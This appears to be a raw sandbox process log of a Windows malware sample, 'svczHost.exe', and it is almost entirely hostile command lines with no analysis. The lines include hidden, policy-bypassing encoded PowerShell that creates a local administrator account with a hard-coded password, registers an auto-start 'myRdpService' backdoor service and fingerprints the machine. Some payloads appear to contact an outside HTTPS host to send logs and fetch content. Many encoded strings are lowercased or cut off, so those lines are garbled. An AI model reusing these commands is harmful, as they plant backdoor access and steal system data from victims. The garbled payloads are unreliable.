AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /k "powershell.exe -windowstyle hidden -encodedcommand "uwb0ageacgb0ac0auabyag8aywblahmacwagahaabwb3aguacgbzaggazqbsagwaiaatafcaaqbuagqabwb3afmadab5agwazqagaggaaqbkagqazqbuacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacialqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabgaiacwaiaaiac0atgbvaewabwbnag8aigasacaaigatae4abwbqahiabwbmagkabablacialaagacialqbfahgazqbjahuadabpag8abgbqag8ababpagmaeqagaeiaeqbwageacwbzacialaagacialqbfag4aywbvagqazqbkaemabwbtag0ayqbuagqaiabtafeaqgbgaeeargbnaeeasqbbaeeabwbbaeyacwbbafyaqqbcaeyaqqbgagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaeuaoabbafiaqqbcahaaqqbhadqaqqbsahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeargbraeeavqb3aeiamabbaeyasqbbafmauqbcae8aqqbhagmaqqblaeeaqqbvaeearqbraeeazab3aeiaeqbbaemaqqbbaesaqqbcagiaqqbgae0aqqblafeaqgb6aeeasabraeeawgbraeiadabbaemanabbafyaqqbcagwaqqbiagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaecaoabbafoaqqbcahaaqqbhadqaqqbaahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeasabraeeavqb3aeiamabbaegasqbbageauqbcahuaqqbhagmaqqblaeeaqgbiaeearqbnaeeaygb3aeiadqbbaegawqbbafoauqbcahkaqqbiafeaqqbyafeaqqa2aeearabvaeeaugbnaeiaeqbbaecaoabbagiauqbcaemaqqbhaeuaqqbjahcaqgbsaeearabzaeeatgbbaeiavabbaegauqbbagmazwbcahaaqqbhadqaqqbaahcaqqbvaeeaqwbjaeeawqbraeiasqbbaeyasqbbae0aqqbcagoaqqbfagcaqqbuafeaqqayaeearqb3aeeazqbraeeanqbbaecabwbbafkazwbbahkaqqbfadqaqqbkagcaqgbpaeeargbjaeeavgbnaeeadwbbaecarqbbafiadwbbaduaqqbhahmaqqbxagcaqgbuaeearabvaeeayqb3aeiayqbbaeyatqbbae8auqbcafeaqqbgae0aqqbnaeeaqqaxaeearwawaeeasqbnaeeacabbaemaawbbaesauqbbahaaqqbdadqaqqbrahcaqgbqaeearwa0aeeavgbbaeiargbbaecanabbagqaqqbbahaaqqbdagsaqqaiaa=="" && exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -encodedcommand "uwb0ageacgb0ac0auabyag8aywblahmacwagahaabwb3aguacgbzaggazqbsagwaiaatafcaaqbuagqabwb3afmadab5agwazqagaggaaqbkagqazqbuacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacialqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabgaiacwaiaaiac0atgbvaewabwbnag8aigasacaaigatae4abwbqahiabwbmagkabablacialaagacialqbfahgazqbjahuadabpag8abgbqag8ababpagmaeqagaeiaeqbwageacwbzacialaagacialqbfag4aywbvagqazqbkaemabwbtag0ayqbuagqaiabtafeaqgbgaeeargbnaeeasqbbaeeabwbbaeyacwbbafyaqqbcaeyaqqbgagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaeuaoabbafiaqqbcahaaqqbhadqaqqbsahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeargbraeeavqb3aeiamabbaeyasqbbafmauqbcae8aqqbhagmaqqblaeeaqqbvaeearqbraeeazab3aeiaeqbbaemaqqbbaesaqqbcagiaqqbgae0aqqblafeaqgb6aeeasabraeeawgbraeiadabbaemanabbafyaqqbcagwaqqbiagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaecaoabbafoaqqbcahaaqqbhadqaqqbaahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeasabraeeavqb3aeiamabbaegasqbbageauqbcahuaqqbhagmaqqblaeeaqgbiaeearqbnaeeaygb3aeiadqbbaegawqbbafoauqbcahkaqqbiafeaqqbyafeaqqa2aeearabvaeeaugbnaeiaeqbbaecaoabbagiauqbcaemaqqbhaeuaqqbjahcaqgbsaeearabzaeeatgbbaeiavabbaegauqbbagmazwbcahaaqqbhadqaqqbaahcaqqbvaeeaqwbjaeeawqbraeiasqbbaeyasqbbae0aqqbcagoaqqbfagcaqqbuafeaqqayaeearqb3aeeazqbraeeanqbbaecabwbbafkazwbbahkaqqbfadqaqqbkagcaqgbpaeeargbjaeeavgbnaeeadwbbaecarqbbafiadwbbaduaqqbhahmaqqbxagcaqgbuaeearabvaeeayqb3aeiayqbbaeyatqbbae8auqbcafeaqqbgae0aqqbnaeeaqqaxaeearwawaeeasqbnaeeacabbaemaawbbaesauqbbahaaqqbdadqaqqbrahcaqgbqaeearwa0aeeavgbbaeiargbbaecanabbagqaqqbbahaaqqbdagsaqqaiaa=="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavabfafgadaauaeuabgbjae8arabpag4arwbdadoaogbvafqarga4ac4arwblafqauwb0afiasqboagcakaaoaekadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5agoaygayae4adgbiafcavgawagearwa5agsawgbtaduaawbaafmaoqbqafmamaa1ag0aigapackakqapac4aqwbpag4avabfag4adaapacka
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa0adqamgbkadyazaayagiaygbiagyaoqa1ageamabjadiazaa5adgamwazaduaywa3agmazgaxadiazaa5agqanabhadiamqa2admaygbmagqamwazagyanaayaduanaa3agqaoabladiamqa3adyamwa0adkazgbjaduaygblagmaoqa5adkazabmadcanwblagqangbmagmamqawagmazaayagiaoabmadeaygbmadyazqaxadqamqa5ageazgbkadeayga4aguanga1adiazaa2adaaoaayadaayqa1adyazga1agqaoaa3adiayga5adgamwayagqanqa4agmazgbladyanqazadqaoabiagqayga2adeangbkagiamgazaguanaazagyanwa5adcamgbkageazgazadkamqbmadeamwbiagqangbhadyaoqbjadgaoqaxadkamaayadgamaa3ageayqbkadqamgazadyamga3adgamqaxagmaoabladaazaa0ageayqa3aguazqa5admaoqbkadcanaa1adiamaaxaguazqbkadgamaa2aguazqa5adcaoqbmageaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa0adqamgbkadyazaayagiaygbiagyaoqa1ageamabjadiazaa5adgamwazaduaywa3agmazgaxadiazaa5agqanabhadiamqa2admaygbmagqamwazagyanaayaduanaa3agqaoabladiamqa3adyamwa0adkazgbjaduaygblagmaoqa5adkazabmadcanwblagqangbmagmamqawagmazaayagiaoabmadeaygbmadyazqaxadqamqa5ageazgbkadeayga4aguanga1adiazaa2adaaoaayadaayqa1adyazga1agqaoaa3adiayga5adgamwayagqanqa4agmazgbladyanqazadqaoabiagqayga2adeangbkagiamgazaguanaazagyanwa5adcamgbkageazgazadkamqbmadeamwbiagqangbhadyaoqbjadgaoqaxadkamaayadgamaa3ageayqbkadqamgazadyamga3adgamqaxagmaoabladaazaa0ageayqa3aguazqa5admaoqbkadcanaa1adiamaaxaguazqbkadgamaa2aguazqa5adcaoqbmageaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpacaapqagadaaowagac
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
